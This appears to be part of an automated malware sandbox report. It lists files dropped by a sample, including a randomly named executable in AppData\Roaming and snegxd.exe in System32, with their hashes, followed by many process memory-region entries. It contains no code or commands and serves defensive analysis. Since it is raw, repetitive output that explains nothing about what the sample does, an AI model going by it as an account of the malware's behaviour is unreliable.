SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Windows\System32\snegxd.exeFilesize
6MB
MD5ad68be475251eeb77379192cc890f4ad
SHA155167b688c7c1e9b56335cca96340cfd8bac5fe5
SHA256e2fddd06643814a1dee5308300a52cad398c5b4158e1f83b36fbb0df7dbab426
SHA512524ea171669b274fc63dc55739f95b20e49d84ade51d3cd2b3355966f80624d73fde30e446fe96bb2d51e7679c2894512e8f7ba41491ae389ba470af125ae394
-
\??\pipe\crashpad_4944_JXJKONHQIYDVPDUKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/208-326-0x0000000000000000-mapping.dmp
-
memory/464-314-0x0000000000000000-mapping.dmp
-
memory/464-316-0x0000000003E50000-0x0000000003E85000-memory.dmpFilesize
212KB
-
memory/760-327-0x0000000000000000-mapping.dmp
-
memory/1040-356-0x0000000000000000-mapping.dmp
-
memory/1280-354-0x0000000000000000-mapping.dmp
-
memory/1340-330-0x0000000000000000-mapping.dmp
-
memory/1348-228-0x0000000000000000-mapping.dmp
-
memory/1352-182-0x0000000000000000-mapping.dmp
-
memory/1352-189-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/1352-200-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/1440-372-0x0000000000000000-mapping.dmp
-
memory/1484-340-0x0000000000000000-mapping.dmp
-
memory/1524-190-0x0000000000000000-mapping.dmp
-
memory/1536-353-0x0000000000000000-mapping.dmp
-
memory/1612-290-0x0000000000000000-mapping.dmp
-
memory/1700-334-0x0000000000000000-mapping.dmp
-
memory/1768-156-0x0000000000000000-mapping.dmp
-
memory/1768-159-0x00000000006F0000-0x00000000007BA000-memory.dmpFilesize
808KB
-
memory/1828-161-0x0000000000000000-mapping.dmp
-
memory/1828-165-0x00000000001C0000-0x00000000002CA000-memory.dmpFilesize
1MB
-
memory/1884-331-0x0000000000000000-mapping.dmp
-
memory/1960-368-0x0000000000000000-mapping.dmp
-
memory/1980-251-0x0000000000000000-mapping.dmp
-
memory/2056-259-0x0000000000000000-mapping.dmp
-
memory/2212-360-0x0000000000000000-mapping.dmp
-
memory/2216-134-0x0000000005490000-0x0000000005522000-memory.dmpFilesize
584KB
-
memory/2216-138-0x00000000064C0000-0x00000000064E2000-memory.dmpFilesize
136KB
-
memory/2216-135-0x0000000005550000-0x000000000555A000-memory.dmpFilesize
40KB
-
memory/2216-133-0x0000000005990000-0x0000000005F34000-memory.dmpFilesize
5MB
-
memory/2216-132-0x0000000000A10000-0x0000000000AE6000-memory.dmpFilesize
856KB
-
memory/2216-136-0x00000000057E0000-0x0000000005830000-memory.dmpFilesize
320KB
-
memory/2216-137-0x0000000006000000-0x00000000060B2000-memory.dmpFilesize
712KB
-
memory/2340-312-0x0000000000400000-0x0000000000566000-memory.dmpFilesize
1MB
-
memory/2340-311-0x0000000000000000-mapping.dmp
-
memory/2364-213-0x0000000000000000-mapping.dmp
-
memory/2376-318-0x0000000000000000-mapping.dmp
-
memory/2376-332-0x0000000000000000-mapping.dmp
-
memory/2464-247-0x0000000000000000-mapping.dmp
-
memory/2464-342-0x0000000000000000-mapping.dmp
-
memory/2552-364-0x0000000000000000-mapping.dmp
-
memory/2556-370-0x0000000000000000-mapping.dmp
-
memory/2704-148-0x0000000000000000-mapping.dmp
-
memory/2704-151-0x0000000000540000-0x0000000000618000-memory.dmpFilesize
864KB
-
memory/2748-257-0x0000000000000000-mapping.dmp
-
memory/2792-358-0x0000000000000000-mapping.dmp
-
memory/2840-347-0x0000000000000000-mapping.dmp
-
memory/3076-211-0x0000000000000000-mapping.dmp
-
memory/3076-351-0x0000000000000000-mapping.dmp
-
memory/3240-350-0x0000000000000000-mapping.dmp
-
memory/3308-140-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3308-164-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3308-147-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3308-142-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3308-139-0x0000000000000000-mapping.dmp
-
memory/3308-143-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3316-285-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/3316-296-0x0000027C0B980000-0x0000027C0B9A0000-memory.dmpFilesize
128KB
-
memory/3316-284-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/3316-287-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/3316-306-0x0000027C0B980000-0x0000027C0B9A0000-memory.dmpFilesize
128KB
-
memory/3316-289-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/3316-283-0x0000000140344454-mapping.dmp
-
memory/3316-300-0x0000027C0B980000-0x0000027C0B9A0000-memory.dmpFilesize
128KB
-
memory/3384-346-0x0000000000000000-mapping.dmp
-
memory/3420-343-0x0000000000000000-mapping.dmp
-
memory/3476-175-0x0000000000000000-mapping.dmp
-
memory/3504-335-0x0000000000000000-mapping.dmp
-
memory/3512-345-0x0000000000000000-mapping.dmp
-
memory/3556-317-0x0000000000000000-mapping.dmp
-
memory/3640-183-0x0000000000000000-mapping.dmp
-
memory/3640-187-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3640-184-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3640-191-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3660-329-0x0000000000000000-mapping.dmp
-
memory/3760-168-0x00000183EC9F0000-0x00000183ECAA2000-memory.dmpFilesize
712KB
-
memory/3760-166-0x00000183EADB0000-0x00000183EAE00000-memory.dmpFilesize
320KB
-
memory/3760-167-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3760-180-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3760-169-0x00000183EAE00000-0x00000183EAE22000-memory.dmpFilesize
136KB
-
memory/3760-160-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3760-155-0x00000183E8F60000-0x00000183E909A000-memory.dmpFilesize
1MB
-
memory/3760-152-0x0000000000000000-mapping.dmp
-
memory/3928-188-0x0000000000000000-mapping.dmp
-
memory/3940-299-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3940-226-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3940-178-0x0000000140000000-mapping.dmp
-
memory/3940-177-0x0000000140000000-0x0000000140078000-memory.dmpFilesize
480KB
-
memory/3940-181-0x00007FF91EA80000-0x00007FF91F541000-memory.dmpFilesize
10MB
-
memory/3948-366-0x0000000000000000-mapping.dmp
-
memory/4016-277-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4016-281-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4016-280-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4016-279-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4016-276-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4016-275-0x0000000140344454-mapping.dmp
-
memory/4020-249-0x0000000000000000-mapping.dmp
-
memory/4040-362-0x0000000000000000-mapping.dmp
-
memory/4256-349-0x0000000000000000-mapping.dmp
-
memory/4424-341-0x0000000000000000-mapping.dmp
-
memory/4692-233-0x0000000000000000-mapping.dmp
-
memory/4720-302-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4720-201-0x0000000000000000-mapping.dmp
-
memory/4720-227-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4720-204-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4720-202-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4720-206-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4720-205-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4748-174-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4748-170-0x0000000000000000-mapping.dmp
-
memory/4748-171-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4748-212-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4748-176-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4852-321-0x0000000000400000-0x0000000000566000-memory.dmpFilesize
1MB
-
memory/4852-320-0x0000000000000000-mapping.dmp
-
memory/4940-324-0x0000000002890000-0x00000000028C5000-memory.dmpFilesize
212KB
-
memory/4940-323-0x0000000000000000-mapping.dmp
-
memory/4940-344-0x0000000000000000-mapping.dmp
-
memory/4948-238-0x0000027D25230000-0x0000027D25250000-memory.dmpFilesize
128KB
-
memory/4948-235-0x0000000140344454-mapping.dmp
-
memory/4948-244-0x0000027D26B60000-0x0000027D26B80000-memory.dmpFilesize
128KB
-
memory/4948-242-0x0000027D26B60000-0x0000027D26B80000-memory.dmpFilesize
128KB
-
memory/4948-241-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4948-264-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4948-265-0x0000027D26B60000-0x0000027D26B80000-memory.dmpFilesize
128KB
-
memory/4948-240-0x0000027D26B20000-0x0000027D26B60000-memory.dmpFilesize
256KB
-
memory/4948-239-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4948-237-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4948-236-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4948-234-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4972-192-0x0000000000000000-mapping.dmp
-
memory/4972-217-0x0000000008000000-0x000000000867A000-memory.dmpFilesize
6MB
-
memory/4972-221-0x0000000007B70000-0x0000000007B7E000-memory.dmpFilesize
56KB
-
memory/4972-222-0x0000000007C80000-0x0000000007C9A000-memory.dmpFilesize
104KB
-
memory/4972-223-0x0000000007C60000-0x0000000007C68000-memory.dmpFilesize
32KB
-
memory/4972-219-0x00000000079B0000-0x00000000079BA000-memory.dmpFilesize
40KB
-
memory/4972-218-0x0000000006CE0000-0x0000000006CFA000-memory.dmpFilesize
104KB
-
memory/4972-216-0x0000000006BF0000-0x0000000006C0E000-memory.dmpFilesize
120KB
-
memory/4972-207-0x0000000005710000-0x0000000005776000-memory.dmpFilesize
408KB
-
memory/4972-193-0x0000000002C90000-0x0000000002CC6000-memory.dmpFilesize
216KB
-
memory/4972-194-0x00000000058C0000-0x0000000005EE8000-memory.dmpFilesize
6MB
-
memory/4972-220-0x0000000007BC0000-0x0000000007C56000-memory.dmpFilesize
600KB
-
memory/4972-208-0x0000000005F60000-0x0000000005FC6000-memory.dmpFilesize
408KB
-
memory/4972-210-0x0000000006640000-0x000000000665E000-memory.dmpFilesize
120KB
-
memory/4972-214-0x0000000006C60000-0x0000000006C92000-memory.dmpFilesize
200KB
-
memory/4972-215-0x000000006F1C0000-0x000000006F20C000-memory.dmpFilesize
304KB
-
memory/4980-273-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4980-267-0x0000000140344454-mapping.dmp
-
memory/4980-268-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4980-269-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4980-271-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/4980-272-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/5996-439-0x00007FF93A9E0000-0x00007FF93A9F0000-memory.dmpFilesize
64KB